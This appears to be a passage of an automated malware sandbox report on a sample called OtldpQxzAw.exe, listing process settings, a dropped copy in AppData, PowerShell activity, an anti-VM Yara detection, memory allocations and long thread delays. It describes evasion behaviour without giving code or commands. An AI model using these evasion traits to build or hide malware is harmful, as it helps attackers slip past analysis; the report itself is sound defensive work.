Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 2670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 8850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 9850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 9A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: AA60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: B450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: C450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: D450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 10B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 1880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 51E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 90A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: A0A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: A2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: B2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: B910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: C910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 3000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 30F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory allocated: 3000000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599424	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595610	Jump to behavior
